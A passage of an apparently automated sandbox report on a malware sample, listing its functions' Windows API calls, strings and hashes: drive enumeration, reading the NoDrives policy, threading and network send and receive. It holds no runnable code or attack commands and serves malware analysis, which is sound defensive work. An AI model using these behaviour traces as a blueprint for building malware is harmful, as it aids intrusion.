                                                                                                                                                                                              • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • NoDrives, xrefs: 00406458
                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                              • API String ID: 2666887985-3471754645
                                                                                                                                                                                              • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                              • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                                                                              • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                              • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                                • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2251373460-0
                                                                                                                                                                                              • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                              • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep$CountTickrandsrand
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3488799664-0
                                                                                                                                                                                              • Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                                                                              • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                                                                              • Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _allshl_aullshr
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 673498613-0
                                                                                                                                                                                              • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                              • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                              • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                                                                              • htons.WS2_32(?), ref: 00401281
                                                                                                                                                                                              • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                              • String ID: pdu
                                                                                                                                                                                              • API String ID: 2164660128-2320407122
                                                                                                                                                                                              • Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                                                                              • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040DED8
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 3102160386-507759092
                                                                                                                                                                                              • Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                              • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                              • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                                • Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                              • String ID: pdu$.#v
                                                                                                                                                                                              • API String ID: 309973729-1687148394
                                                                                                                                                                                              • Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                                                                              • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                                                                              • Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
                                                                                                                                                                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DeviceDriveQueryType
                                                                                                                                                                                              • String ID: ?c@$\??\
                                                                                                                                                                                              • API String ID: 1681518211-744975932
                                                                                                                                                                                              • Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                              • Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
                                                                                                                                                                                              • Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                                                                                • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3966618661-0
                                                                                                                                                                                              • Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                                                                              • Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
                                                                                                                                                                                              • Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _allshl
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 435966717-0
                                                                                                                                                                                              • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                              • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,?), ref: 004076E8
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407711
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 2064604595-507759092
                                                                                                                                                                                              • Opcode ID: 0ababd338b93d4f15b5807df93ab29fe9547c17ebc95fa2dc8514e940c4b66a1
                                                                                                                                                                                              • Instruction ID: 1765171bc77b4966af89c460e37a8a9fa1404b8c40c23c814704cc40933dc83e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ababd338b93d4f15b5807df93ab29fe9547c17ebc95fa2dc8514e940c4b66a1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 54F090B1A04308FBDB00DFA4DC46F9E7778AB48704F208468FA08A72C1D675BA10C769
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 1378416451-507759092
                                                                                                                                                                                              • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                              • Instruction ID: 7e163f13d574deee43add6bab66e88a36a5285de070472799180e575aa2043d7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F03774A40308FBDB20DFA4DC49FCD7B74EB04701F2082A4FA047B2D0D6B55A418B44
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                                                                              • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3980219359-0
                                                                                                                                                                                              • Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                              • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                                                                              • Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                                                                              • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2074799992-0
                                                                                                                                                                                              • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                              • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                              • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                                                                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3668019968-0
                                                                                                                                                                                              • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                              • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                                                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
